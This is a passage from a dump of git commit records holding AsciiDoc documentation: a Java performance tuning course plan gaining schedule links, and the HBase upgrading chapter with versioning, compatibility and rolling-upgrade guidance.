world!\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"b13200096e5873674d91b950a12566ccfccd86d4","subject":"feat(plan): add links in day1 schedule","message":"feat(plan): add links in day1 schedule\n","repos":"arnauldvm\/jpt-course","old_file":"src\/main\/adoc\/0-extra\/1-training_plan.adoc","new_file":"src\/main\/adoc\/0-extra\/1-training_plan.adoc","new_contents":"\/\/ build_options: \nJava Performance Tuning - Training Plan\n=======================================\nArnauld Van Muysewinkel <avm@pendragon.be>\nv1.0, 15-Nov-2015: First complete version\n:backend: slidy\n\/\/:theme: volnitsky\n:data-uri:\n:copyright: Creative-Commons-Zero (Arnauld Van Muysewinkel)\n:br: pass:[<br>]\n\n\nDay 1 - AM\n----------\n\n*****\nWriting performance tests\n*****\n\n* link:..\/1-intro\/0-introduction.html#_introduction_to_the_course[Introduction]\n* _link:..\/1-intro\/w0-install.html#_content[Workshop 0: install the training toolsuite]_\n\n* link:..\/2-benchmark\/1-benchmark_design.html#_rtri_anatomy_of_a_test[Designing your benchmarks]: Anatomy of a test\n\n* link:..\/2-benchmark\/2-benchmark_tool.html#_content[Benchmarking tools]:\n** 
Basics (Injector, Market overview, Threading model, Back-pressure)\n** Introduction to JMeter\n\n* _link:..\/2-benchmark\/w1-first_benchmark.html#_content[Workshop 1: write your first performance tests]_\n\n* link:..\/4-process\/0-perf_test_process.html#_content[Performance testing process]\n\nDay 1 - PM\n----------\n\n*****\nWriting performance tests (cont'd)\n*****\n\n* link:..\/2-benchmark\/1-benchmark_design.html#_rtri_introduction[Designing your benchmarks]:\n** Planning your test\n** Load profiles\n** Metrics\n\n* link:..\/2-benchmark\/2-benchmark_tool.html#_jmeter_expressions_amp_functions[Benchmarking tools]:\n** JMeter: expressions & functions, shell\n** becoming an expert: randomization, data analysis, mock-ups\n\n* _Workshop 2: wrap up your performance tests_\n\n\nDay 2 - AM\n----------\n\n*****\nInvestigating performance issues\n*****\n\n* Performance Diagnostic Model (PDM): Introduction{br} \n* ⌖ Reminder about OSes internals (scheduling...)\n* PDM: Layer 1 (OS)\n* OS Monitoring tools\n* _Workshop 3 (interactive): PDM Layer 1 (OS) in practice_\n\n\nDay 2 - PM\n----------\n\n*****\nInvestigating performance issues (cont'd)\n*****\n\n* PDM: Layer 2 (JVM)\n* ⌖ Reminder of some JVM internals (GC, JIT...)\n* JVM Monitoring tools\n* _Workshop 4 (interactive): PDM Layer 2 (JVM) in practice_\n\n\nDay 3 - AM\n----------\n\n*****\nInvestigating performance issues (cont'd)\n*****\n\n* PDM: Layer 3 (Application)\n* Application Monitoring tools\n* _Workshop 5 (interactive): PDM Layer 3 (Application) in practice_\n\n\nDay 3 - PM\n----------\n\n*****\nGoing further\n*****\n\n* Other analysis tools (RG, Excel, R, ELK...)\n* _Workshop 6: Using the Report Generator (beta)_ (?)\n\/\/ Is it feasible to share the RG with a broader audience?\n* Introduction to Hyperion (?)\n* Best Practices (JSF, JPA, SQL...)\n* Web front-end performance (?)\n\n\nPresentations\n-------------\n\n* link:..\/1-intro\/0-introduction.html#_content[Introduction]\n* link:..\/1-intro\/1-objectives.html#_content[Objectives]\n* link:..\/2-benchmark\/1-benchmark_design.html#_content[Designing your benchmarks]\n* link:..\/2-benchmark\/2-benchmark_tool.html#_content[Benchmarking tools]\n* link:..\/3-pdm\/0-pdm_intro.html#_content[Performance Diagnostic Model (introduction)]\n* link:..\/3-pdm\/1-pdm_l1-os.html#_content[PDM Layer 1: Operating System]\n* link:..\/3-pdm\/2-pdm_l2-jvm.html#_content[PDM Layer 2: Java Virtual Machine]\n* link:..\/3-pdm\/3-pdm_l3-app.html#_content[PDM Layer 3: Application]\n* link:..\/4-process\/0-perf_test_process.html#_content[Performance Testing Process]\n* link:..\/5-analysis\/1-analysis_tools.html#_content[Analysis Tools]\n\n\nWorkshops\n---------\n\n* link:..\/1-intro\/w0-install.html#_content[Install the training toolsuite]\n* link:..\/2-benchmark\/w1-first_benchmark.html#_content[First performance test]\n* link:..\/2-benchmark\/w2-wrapup_benchmark.html#_content[Wrap-up the performance test]\n* link:..\/3-pdm\/w3-dominant_os.html#_content[PDM Layer 1 (OS) in practice]\n* link:..\/3-pdm\/w4-dominant_jvm.html#_content[PDM Layer 2 (JVM) in practice]\n* link:..\/3-pdm\/w5-dominant_app.html#_content[PDM Layer 3 (Application) in practice]\n\n\nExtras\n------\n\n* link:..\/0-extra\/0-course_description.html#_content[Course Description]\n* link:..\/0-extra\/1-training_plan.html#_content[Course Plan]\n* link:..\/0-extra\/2-internals_os.html#_content[Operating Systems Internals]\n* link:..\/0-extra\/3-internals_jvm.html#_content[Java VM Internals]\n* link:..\/0-extra\/4-best_practices.html#_content[Best 
Practices]\n","old_contents":"\/\/ build_options: \nJava Performance Tuning - Training Plan\n=======================================\nArnauld Van Muysewinkel <avm@pendragon.be>\nv1.0, 15-Nov-2015: First complete version\n:backend: slidy\n\/\/:theme: volnitsky\n:data-uri:\n:copyright: Creative-Commons-Zero (Arnauld Van Muysewinkel)\n:br: pass:[<br>]\n\n\nDay 1 - AM\n----------\n\n*****\nWriting performance tests\n*****\n\n* Introduction\n* _Workshop 0: install training toolsuite_\n* Anatomy of a test\n* Benchmarking tool: basics\n* _Workshop 1: write your first performance tests_\n\n\n* Performance testing process\n\nDay 1 - PM\n----------\n\n*****\nWriting performance tests (cont'd)\n*****\n\n* Planning your test\n* Load profiles\n* Metrics\n* Benchmarking tool: threading model, timers\n* Benchmarking tool: parameters\n* _Workshop 2: wrap up your performance tests_\n\n\nDay 2 - AM\n----------\n\n*****\nInvestigating performance issues\n*****\n\n* Performance Diagnostic Model (PDM): Introduction{br} \n* ⌖ Reminder about OSes internals (scheduling...)\n* PDM: Layer 1 (OS)\n* OS Monitoring tools\n* _Workshop 3 (interactive): PDM Layer 1 (OS) in practice_\n\n\nDay 2 - PM\n----------\n\n*****\nInvestigating performance issues (cont'd)\n*****\n\n* PDM: Layer 2 (JVM)\n* ⌖ Reminder of some JVM internals (GC, JIT...)\n* JVM Monitoring tools\n* _Workshop 4 (interactive): PDM Layer 2 (JVM) in practice_\n\n\nDay 3 - AM\n----------\n\n*****\nInvestigating performance issues (cont'd)\n*****\n\n* PDM: Layer 3 (Application)\n* Application Monitoring tools\n* _Workshop 5 (interactive): PDM Layer 3 (Application) in practice_\n\n\nDay 3 - PM\n----------\n\n*****\nGoing further\n*****\n\n* Other analysis tools (RG, Excel, R, ELK...)\n* _Workshop 6: Using the Report Generator (beta)_ (?)\n\/\/ Is it feasible to share the RG with a broader audience?\n* Introduction to Hyperion (?)\n* Best Practices (JSF, JPA, SQL...)\n* Web front-end performance (?)\n\n\nPresentations\n-------------\n\n* link:..\/1-intro\/0-introduction.html#_content[Introduction]\n* link:..\/1-intro\/1-objectives.html#_content[Objectives]\n* link:..\/2-benchmark\/1-benchmark_design.html#_content[Designing your benchmarks]\n* link:..\/2-benchmark\/2-benchmark_tool.html#_content[Benchmarking tools]\n* link:..\/3-pdm\/0-pdm_intro.html#_content[Performance Diagnostic Model (introduction)]\n* link:..\/3-pdm\/1-pdm_l1-os.html#_content[PDM Layer 1: Operating System]\n* link:..\/3-pdm\/2-pdm_l2-jvm.html#_content[PDM Layer 2: Java Virtual Machine]\n* link:..\/3-pdm\/3-pdm_l3-app.html#_content[PDM Layer 3: Application]\n* link:..\/4-process\/0-perf_test_process.html#_content[Performance Testing Process]\n* link:..\/5-analysis\/1-analysis_tools.html#_content[Analysis Tools]\n\n\nWorkshops\n---------\n\n* link:..\/1-intro\/w0-install.html#_content[Install the training toolsuite]\n* link:..\/2-benchmark\/w1-first_benchmark.html#_content[First performance test]\n* link:..\/2-benchmark\/w2-wrapup_benchmark.html#_content[Wrap-up the performance test]\n* link:..\/3-pdm\/w3-dominant_os.html#_content[PDM Layer 1 (OS) in practice]\n* link:..\/3-pdm\/w4-dominant_jvm.html#_content[PDM Layer 2 (JVM) in practice]\n* link:..\/3-pdm\/w5-dominant_app.html#_content[PDM Layer 3 (Application) in practice]\n\n\nExtras\n------\n\n* link:..\/0-extra\/0-course_description.html#_content[Course Description]\n* link:..\/0-extra\/1-training_plan.html#_content[Course Plan]\n* link:..\/0-extra\/2-internals_os.html#_content[Operating Systems Internals]\n* 
link:..\/0-extra\/3-internals_jvm.html#_content[Java VM Internals]\n* link:..\/0-extra\/4-best_practices.html#_content[Best Practices]\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"e09b28941f283ea5463bc7c915a7142026b58ade","subject":"HBASE-13554 Clarify release versioning policy.","message":"HBASE-13554 Clarify release versioning policy.\n\nHBase is not following the strictness of SemVer, so\nmake sure we correctly advertise this. Document the\nedge-case where APIs may be added in patch-releases.\n\nSigned-off-by: Sean Busbey <5c0191c5bda2836af1cb87878694cfbf1db676c8@apache.org>\n","repos":"Eshcar\/hbase,Eshcar\/hbase,ultratendency\/hbase,gustavoanatoly\/hbase,andrewmains12\/hbase,bijugs\/hbase,lshmouse\/hbase,ultratendency\/hbase,gustavoanatoly\/hbase,francisliu\/hbase,JingchengDu\/hbase,Eshcar\/hbase,gustavoanatoly\/hbase,SeekerResource\/hbase,ultratendency\/hbase,ultratendency\/hbase,Eshcar\/hbase,francisliu\/hbase,SeekerResource\/hbase,lshmouse\/hbase,Apache9\/hbase,bijugs\/hbase,juwi\/hbase,ndimiduk\/hbase,SeekerResource\/hbase,Apache9\/hbase,gustavoanatoly\/hbase,SeekerResource\/hbase,lshmouse\/hbase,JingchengDu\/hbase,lshmouse\/hbase,vincentpoon\/hbase,narendragoyal\/hbase,JingchengDu\/hbase,Apache9\/hbase,ultratendency\/hbase,bijugs\/hbase,Eshcar\/hbase,HubSpot\/hbase,andrewmains12\/hbase,Eshcar\/hbase,ChinmaySKulkarni\/hbase,lshmouse\/hbase,andrewmains12\/hbase,gustavoanatoly\/hbase,Eshcar\/hbase,mahak\/hbase,lshmouse\/hbase,andrewmains12\/hbase,lshmouse\/hbase,SeekerResource\/hbase,lshmouse\/hbase,Apache9\/hbase,mahak\/hbase,narendragoyal\/hbase,andrewmains12\/hbase,ChinmaySKulkarni\/hbase,ChinmaySKulkarni\/hbase,bijugs\/hbase,JingchengDu\/hbase,JingchengDu\/hbase,vincentpoon\/hbase,vincentpoon\/hbase,bijugs\/hbase,narendragoyal\/hbase,ChinmaySKulkarni\/hbase,ndimiduk\/hbase,francisliu\/hbase,francisliu\/hbase,lshmouse\/hbase,HubSpot\/hbase,andrewmains12\/hbase,Apache9\/hbase,apurtell\/hbase,apurtell\/hbase,apurtell\/hbase,mahak\/hbase,apurtell\/hbase,francisliu\/hbase,Eshcar\/hbase,lshmouse\/hbase,ChinmaySKulkarni\/hbase,gustavoanatoly\/hbase,bijugs\/hbase,HubSpot\/hbase,apurtell\/hbase,mahak\/hbase,SeekerResource\/hbase,HubSpot\/hbase,narendragoyal\/hbase,JingchengDu\/hbase,SeekerResource\/hbase,JingchengDu\/hbase,narendragoyal\/hbase,HubSpot\/hbase,Apache9\/hbase,apurtell\/hbase,HubSpot\/hbase,ultratendency\/hbase,Apache9\/hbase,mahak\/hbase,mahak\/hbase,gustavoanatoly\/hbase,ndimiduk\/hbase,juwi\/hbase,mahak\/hbase,ndimiduk\/hbase,narendragoyal\/hbase,juwi\/hbase,juwi\/hbase,Apache9\/hbase,gustavoanatoly\/hbase,vincentpoon\/hbase,vincentpoon\/hbase,apurtell\/hbase,andrewmains12\/hbase,andrewmains12\/hbase,apurtell\/hbase,ultratendency\/hbase,vincentpoon\/hbase,ChinmaySKulkarni\/hbase,ndimiduk\/hbase,SeekerResource\/hbase,francisliu\/hbase,ChinmaySKulkarni\/hbase,vincentpoon\/hbase,francisliu\/hbase,ndimiduk\/hbase,vincentpoon\/hbase,ndimiduk\/hbase,juwi\/hbase,Apache9\/hbase,HubSpot\/hbase,andrewmains12\/hbase,ndimiduk\/hbase,bijugs\/hbase,SeekerResource\/hbase,gustavoanatoly\/hbase,ndimiduk\/hbase,juwi\/hbase,narendragoyal\/hbase,JingchengDu\/hbase,vincentpoon\/hbase,HubSpot\/hbase,narendragoyal\/hbase,apurtell\/hbase,narendragoyal\/hbase,francisliu\/hbase,juwi\/hbase,mahak\/hbase,bijugs\/hbase,ndimiduk\/hbase,Eshcar\/hbase,juwi\/hbase,ultratendency\/hbase,HubSpot\/hbase,mahak\/hbase,ChinmaySKulkarni\/hbase,francisliu\/hbase,JingchengDu\/hbase,andrewmains12\/hbase,Apache9\/hbase,ultratendency\/hbase,SeekerResource\/hbase,ChinmaySKulkarni\/hba
se,JingchengDu\/hbase,mahak\/hbase,vincentpoon\/hbase,apurtell\/hbase,gustavoanatoly\/hbase,HubSpot\/hbase,ChinmaySKulkarni\/hbase,ultratendency\/hbase,Eshcar\/hbase,juwi\/hbase,bijugs\/hbase,narendragoyal\/hbase,bijugs\/hbase,francisliu\/hbase","old_file":"src\/main\/asciidoc\/_chapters\/upgrading.adoc","new_file":"src\/main\/asciidoc\/_chapters\/upgrading.adoc","new_contents":"\/\/\/\/\n\/**\n *\n * Licensed to the Apache Software Foundation (ASF) under one\n * or more contributor license agreements. See the NOTICE file\n * distributed with this work for additional information\n * regarding copyright ownership. The ASF licenses this file\n * to you under the Apache License, Version 2.0 (the\n * \"License\"); you may not use this file except in compliance\n * with the License. You may obtain a copy of the License at\n *\n * http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n *\/\n\/\/\/\/\n\n[[upgrading]]\n= Upgrading\n:doctype: book\n:numbered:\n:toc: left\n:icons: font\n:experimental:\n\nYou cannot skip major versions when upgrading. If you are upgrading from version 0.90.x to 0.94.x, you must first go from 0.90.x to 0.92.x and then go from 0.92.x to 0.94.x.\n\nNOTE: It may be possible to skip across versions -- for example go from 0.92.2 straight to 0.98.0 just following the 0.96.x upgrade instructions -- but these scenarios are untested.\n\nReview <<configuration>>, in particular <<hadoop>>.\n\n[[hbase.versioning]]\n== HBase version number and compatibility\n\nHBase has two versioning schemes, pre-1.0 and post-1.0. Both are detailed below.\n\n[[hbase.versioning.post10]]\n=== Post 1.0 versions\n\nStarting with the 1.0.0 release, HBase is working towards link:http:\/\/semver.org\/[Semantic Versioning] for its release versioning. In summary:\n\n.Given a version number MAJOR.MINOR.PATCH, increment the:\n* MAJOR version when you make incompatible API changes,\n* MINOR version when you add functionality in a backwards-compatible manner, and\n* PATCH version when you make backwards-compatible bug fixes.\n* Additional labels for pre-release and build metadata are available as extensions to the MAJOR.MINOR.PATCH format.\n\n[[hbase.versioning.compat]]\n.Compatibility Dimensions\nIn addition to the usual API versioning considerations HBase has other compatibility dimensions that we need to consider.\n\n.Client-Server wire protocol compatibility\n* Allows updating client and server out of sync.\n* We could only allow upgrading the server first. I.e. 
the server would be backward compatible with an old client, that way new APIs are OK.\n* Example: A user should be able to use an old client to connect to an upgraded cluster.\n\n.Server-Server protocol compatibility\n* Servers of different versions can co-exist in the same cluster.\n* The wire protocol between servers is compatible.\n* Workers for distributed tasks, such as replication and log splitting, can co-exist in the same cluster.\n* Dependent protocols (such as using ZK for coordination) will also not be changed.\n* Example: A user can perform a rolling upgrade.\n\n.File format compatibility\n* File formats are backward and forward compatible.\n* Example: File, ZK encoding, directory layout is upgraded automatically as part of an HBase upgrade. User can roll back to the older version and everything will continue to work.\n\n.Client API compatibility\n* Allow changing or removing existing client APIs.\n* An API needs to be deprecated for a major version before we will change\/remove it.\n* APIs available in a patch version will be available in all later patch versions. However, new APIs may be added which will not be available in earlier patch versions.\n* Example: A user using a newly deprecated api does not need to modify application code with hbase api calls until the next major version.\n\n.Client Binary compatibility\n* Client code written to APIs available in a given patch release can run unchanged (no recompilation needed) against the new jars of later patch versions.\n* Client code written to APIs available in a given patch release might not run against the old jars from an earlier patch version.\n* Example: Old compiled client code will work unchanged with the new jars.\n\n.Server-Side Limited API compatibility (taken from Hadoop)\n* Internal APIs are marked as Stable, Evolving, or Unstable.\n* This implies binary compatibility for coprocessors and plugins (pluggable classes, including replication) as long as these are only using marked interfaces\/classes.\n* Example: Old compiled Coprocessor, Filter, or Plugin code will work unchanged with the new jars.\n\n.Dependency Compatibility\n* An upgrade of HBase will not require an incompatible upgrade of a dependent project, including the Java runtime.\n* Example: An upgrade of Hadoop will not invalidate any of the compatibility guarantees we made.\n\n.Operational Compatibility\n* Metric changes\n* Behavioral changes of services\n* Web page APIs\n\n.Summary\n* A patch upgrade is a drop-in replacement. Any change that is not Java binary compatible would not be allowed.footnote:[See http:\/\/docs.oracle.com\/javase\/specs\/jls\/se7\/html\/jls-13.html.] Downgrading versions within patch releases may not be compatible.\n\n* A minor upgrade requires no application\/client code modification. Ideally it would be a drop-in replacement but client code, coprocessors, filters, etc. might have to be recompiled if new jars are used.\n\n* A major upgrade allows the HBase community to make breaking changes.\n\n.Compatibility Matrix footnote:[Note that this indicates what could break, not that it will break. We will\/should add specifics in our release notes.]\n[cols=\"1,1,1,1\"]\n|===\n| | Major | Minor | Patch\n|Client-Server wire Compatibility| N |Y |Y\n|Server-Server Compatibility |N |Y |Y\n|File Format Compatibility | N footnote:[comp_matrix_offline_upgrade_note,Running an offline upgrade tool without rollback might be needed. We will typically only support migrating data from major version X to major version X+1.] 
| Y |Y\n|Client API Compatibility | N | Y |Y\n|Client Binary Compatibility | N | N |Y\n4+|Server-Side Limited API Compatibility\n>| Stable | N | Y | Y\n>| Evolving | N |N |Y\n>| Unstable | N |N |N\n|Dependency Compatibility | N |Y |Y\n|Operational Compatibility | N |N |Y\n|===\n\n[[hbase.client.api.surface]]\n==== HBase API Surface\n\nHBase has a lot of API points, but for the compatibility matrix above, we differentiate between Client API, Limited Private API, and Private API. HBase uses a version of link:https:\/\/hadoop.apache.org\/docs\/current\/hadoop-project-dist\/hadoop-common\/Compatibility.html[Hadoop's Interface classification]. HBase's Interface classification classes can be found link:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/classification\/package-summary.html[here].\n\n* InterfaceAudience: captures the intended audience, possible values are Public (for end users and external projects), LimitedPrivate (for other Projects, Coprocessors or other plugin points), and Private (for internal use).\n* InterfaceStability: describes what types of interface changes are permitted. Possible values are Stable, Evolving, Unstable, and Deprecated.\n\n[[hbase.client.api]]\nHBase Client API::\n The HBase Client API consists of all the classes or methods that are marked with the InterfaceAudience.Public interface. All main classes in hbase-client and dependent modules have either the InterfaceAudience.Public, InterfaceAudience.LimitedPrivate, or InterfaceAudience.Private marker. Not all classes in other modules (hbase-server, etc) have the marker. If a class is not annotated with one of these, it is assumed to be an InterfaceAudience.Private class.\n\n[[hbase.limitetprivate.api]]\nHBase LimitedPrivate API::\n The LimitedPrivate annotation comes with a set of target consumers for the interfaces. Those consumers are coprocessors, Phoenix, replication endpoint implementations or similar. At this point, HBase only guarantees source and binary compatibility for these interfaces between patch versions.\n\n[[hbase.private.api]]\nHBase Private API::\n All classes annotated with InterfaceAudience.Private or all classes that do not have the annotation are for HBase internal use only. The interfaces and method signatures can change at any point in time. If you are relying on a particular interface that is marked Private, you should open a jira to propose changing the interface to be Public or LimitedPrivate, or an interface exposed for this purpose.\n\n[[hbase.versioning.pre10]]\n=== Pre 1.0 versions\n\nBefore the semantic versioning scheme pre-1.0, HBase tracked either Hadoop's versions (0.2x) or 0.9x versions. If you are into the arcane, check out our old wiki page on link:http:\/\/wiki.apache.org\/hadoop\/Hbase\/HBaseVersions[HBase Versioning] which tries to connect the HBase version dots. The below sections cover ONLY the releases before 1.0.\n\n[[hbase.development.series]]\n.Odd\/Even Versioning or \"Development\" Series Releases\nAhead of big releases, we have been putting up preview versions to start the feedback cycle turning over earlier. These \"Development\" Series releases, always odd-numbered, come with no guarantees, not even with regard to being able to upgrade between two sequential releases (we reserve the right to break compatibility across \"Development\" Series releases). Needless to say, these releases are not for production deploys. 
They are a preview of what is coming in the hope that interested parties will take the release for a test drive and flag us early if there are issues we've missed ahead of our rolling a production-worthy release.\n\nOur first \"Development\" Series was the 0.89 set that came out ahead of HBase 0.90.0. HBase 0.95 is another \"Development\" Series that portends HBase 0.96.0. 0.99.x is the last series in \"developer preview\" mode before 1.0. Afterwards, we will be using the semantic versioning naming scheme (see above).\n\n[[hbase.binary.compatibility]]\n.Binary Compatibility\nWhen we say two HBase versions are compatible, we mean that the versions are wire and binary compatible. Compatible HBase versions mean that clients can talk to compatible but differently versioned servers. It means too that you can just swap out the jars of one version and replace them with the jars of another, compatible version and all will just work. Unless otherwise specified, HBase point versions are (mostly) binary compatible. You can safely do rolling upgrades between binary compatible versions; i.e. across point versions: e.g. from 0.94.5 to 0.94.6. See link:[Does compatibility between versions also mean binary compatibility?] discussion on the HBase dev mailing list.\n\n[[hbase.rolling.upgrade]]\n=== Rolling Upgrades\n\nA rolling upgrade is the process by which you update the servers in your cluster a server at a time. You can rolling upgrade across HBase versions if they are binary or wire compatible. See <<hbase.rolling.restart>> for more on what this means. Coarsely, a rolling upgrade is a graceful stop of each server, an update of the software, and then a restart. You do this for each server in the cluster. Usually you upgrade the Master first and then the RegionServers. See <<rolling>> for tools that can help with the rolling upgrade process.\n\nFor example, in the below, HBase was symlinked to the actual HBase install. On upgrade, before running a rolling restart over the cluster, we changed the symlink to point at the new HBase software version and then ran\n\n[source,bash]\n----\n$ HADOOP_HOME=~\/hadoop-2.6.0-CRC-SNAPSHOT ~\/hbase\/bin\/rolling-restart.sh --config ~\/conf_hbase\n----\n\nThe rolling-restart script will first gracefully stop and restart the master, and then each of the RegionServers in turn. Because the symlink was changed, on restart the server will come up using the new HBase version. Check logs for errors as the rolling upgrade proceeds.\n\n[[hbase.rolling.restart]]\n.Rolling Upgrade Between Versions that are Binary\/Wire Compatible\nUnless otherwise specified, HBase point versions are binary compatible. You can do a <<hbase.rolling.upgrade>> between HBase point versions. For example, you can go to 0.94.6 from 0.94.5 by doing a rolling upgrade across the cluster replacing the 0.94.5 binary with a 0.94.6 binary.\n\n
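If you prefer to drive a compatible rolling upgrade host by host rather than with _rolling-restart.sh_, a minimal sketch of the per-server loop follows. It assumes the new binaries are already staged on every host (for example via the symlink flip shown above) and that _conf\/regionservers_ lists your RegionServers:\n\n[source,bash]\n----\n# A sketch only: restart each RegionServer in turn; --reload moves the\n# server's regions off and back again around the restart.\n$ for rs in $(cat conf\/regionservers); do .\/bin\/graceful_stop.sh --restart --reload --debug $rs; done\n----\n\nIn the minor version-particular sections below, we call out where the versions are wire\/protocol compatible and in this case, it is also possible to do a <<hbase.rolling.upgrade>>. For example, in <<upgrade1.0.rolling.upgrade>>, we state that it is possible to do a rolling upgrade between hbase-0.98.x and hbase-1.0.0.\n\n== Upgrade Paths\n\n[[upgrade1.0]]\n=== Upgrading from 0.98.x to 1.0.x\n\nIn this section we first note the significant changes that come in with 1.0.0 HBase and then we go over the upgrade process. 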
Be sure to read the significant changes section with care so you avoid surprises.\n\n==== Changes of Note!\n\nIn here we list important changes that are in 1.0.0 since 0.98.x, changes you should be aware of that will go into effect once you upgrade.\n\n[[zookeeper.3.4]]\n.ZooKeeper 3.4 is required in HBase 1.0.0\nSee <<zookeeper.requirements>>.\n\n[[default.ports.changed]]\n.HBase Default Ports Changed\nThe ports used by HBase changed. They used to be in the 600XX range. In HBase 1.0.0 they have been moved up out of the ephemeral port range and are 160XX instead (the Master web UI was 60010 and is now 16010; the RegionServer web UI was 60030 and is now 16030, etc.). If you want to keep the old port locations, copy the port setting configs from _hbase-default.xml_ into _hbase-site.xml_, change them back to the old values from the HBase 0.98.x era, and ensure you've distributed your configurations before you restart.\n\n[[upgrade1.0.hbase.bucketcache.percentage.in.combinedcache]]\n.hbase.bucketcache.percentage.in.combinedcache configuration has been REMOVED\nYou may have made use of this configuration if you are using BucketCache. If NOT using BucketCache, this change does not affect you. Its removal means that your L1 LruBlockCache is now sized using `hfile.block.cache.size` -- i.e. the way you would size the on-heap L1 LruBlockCache if you were NOT doing BucketCache -- and the BucketCache size is now whatever the setting for `hbase.bucketcache.size` is. You may need to adjust configs to get the LruBlockCache and BucketCache sizes set to what they were in 0.98.x and previous. If you did not set this config, its default value was 0.9. If you do nothing, your BucketCache will increase in size by 10%. Your L1 LruBlockCache will become `hfile.block.cache.size` times your Java heap size (`hfile.block.cache.size` is a float between 0.0 and 1.0). To read more, see link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-11520[HBASE-11520 Simplify offheap cache config by removing the confusing \"hbase.bucketcache.percentage.in.combinedcache\"].\n\n[[hbase-12068]]\n.If you have your own custom filters.\nSee the release notes on the issue link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-12068[HBASE-12068 [Branch-1\\] Avoid need to always do KeyValueUtil#ensureKeyValue for Filter transformCell]; be sure to follow the recommendations therein.\n\n[[dlr]]\n.Distributed Log Replay\n<<distributed.log.replay>> is off by default in HBase 1.0.0. Enabling it can make a big difference in improving HBase MTTR. Enable this feature if you are doing a clean stop\/start when you are upgrading. You cannot rolling upgrade to this feature (caveat if you are running on a version of HBase in excess of HBase 0.98.4 -- see link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-12577[HBASE-12577 Disable distributed log replay by default] for more).\n\n
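If you do decide to enable it for a clean stop\/start upgrade, a minimal sketch of the _hbase-site.xml_ addition follows; the property name here is assumed from the HBASE-12577 discussion, so verify it against your release before relying on it:\n\n----\n<property>\n  <name>hbase.master.distributed.log.replay<\/name>\n  <value>true<\/value>\n<\/property>\n----\n\n[[upgrade1.0.rolling.upgrade]]\n==== Rolling upgrade from 0.98.x to HBase 1.0.0\n.From 0.96.x to 1.0.0\nNOTE: You cannot do a <<hbase.rolling.upgrade,rolling upgrade>> from 0.96.x to 1.0.0 without first doing a rolling upgrade to 0.98.x. See comment in link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-11164?focusedCommentId=14182330&page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel#comment-14182330[HBASE-11164 Document and test rolling updates from 0.98 -> 1.0] for the why. 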
Also because HBase 1.0.0 enables HFile v3 by default, link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-9801[HBASE-9801 Change the default HFile version to V3], and support for HFile v3 only arrives in 0.98, this is another reason you cannot rolling upgrade from HBase 0.96.x; if the rolling upgrade stalls, the 0.96.x servers cannot open files written by the servers running the newer HBase 1.0.0 with HFiles of version 3.\n\nThere are no known issues running a <<hbase.rolling.upgrade,rolling upgrade>> from HBase 0.98.x to HBase 1.0.0.\n\n[[upgrade1.0.from.0.94]]\n==== Upgrading to 1.0 from 0.94\nYou cannot rolling upgrade from 0.94.x to 1.x.x. You must stop your cluster, install the 1.x.x software, run the migration described at <<executing.the.0.96.upgrade>> (substituting 1.x.x wherever we make mention of 0.96.x in the section below), and then restart. Be sure to upgrade your ZooKeeper if it is a version less than the required 3.4.x.\n\n[[upgrade0.98]]\n=== Upgrading from 0.96.x to 0.98.x\nA rolling upgrade from 0.96.x to 0.98.x works. The two versions are not binary compatible.\n\nAdditional steps are required to take advantage of some of the new features of 0.98.x, including cell visibility labels, cell ACLs, and transparent server side encryption. See <<security>> for more information. Significant performance improvements include a change to the write ahead log threading model that provides higher transaction throughput under high load, reverse scanners, MapReduce over snapshot files, and striped compaction.\n\nClients and servers can run with 0.98.x and 0.96.x versions. However, applications may need to be recompiled due to changes in the Java API.\n\n=== Upgrading from 0.94.x to 0.98.x\nA rolling upgrade from 0.94.x directly to 0.98.x does not work. The upgrade path follows the same procedures as <<upgrade0.96>>. Additional steps are required to use some of the new features of 0.98.x. See <<upgrade0.98>> for an abbreviated list of these features.\n\n[[upgrade0.96]]\n=== Upgrading from 0.94.x to 0.96.x\n\n==== The \"Singularity\"\n\n.HBase 0.96.x was EOL'd, September 1st, 2014\nNOTE: Do not deploy 0.96.x. Deploy at least 0.98.x. See link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-11642[EOL 0.96].\n\nYou will have to stop your old 0.94.x cluster completely to upgrade. If you are replicating between clusters, both clusters will have to go down to upgrade. Make sure it is a clean shutdown. The fewer WAL files around, the faster the upgrade will run (the upgrade will split any log files it finds in the filesystem as part of the upgrade process). All clients must be upgraded to 0.96 too.\n\nThe API has changed. You will need to recompile your code against 0.96 and you may need to adjust applications to go against new APIs (TODO: List of changes).\n\n[[executing.the.0.96.upgrade]]\n==== Executing the 0.96 Upgrade\n\n.HDFS and ZooKeeper must be up!\nNOTE: HDFS and ZooKeeper should be up and running during the upgrade process.\n\nHBase 0.96.0 comes with an upgrade script. Run\n\n[source,bash]\n----\n$ bin\/hbase upgrade\n----\nto see its usage. The script has two main modes: `-check` and `-execute`.\n\n.check\nThe check step is run against a running 0.94 cluster. Run it from a downloaded 0.96.x binary. The check step is looking for the presence of HFile v1 files. These are unsupported in HBase 0.96.0. 
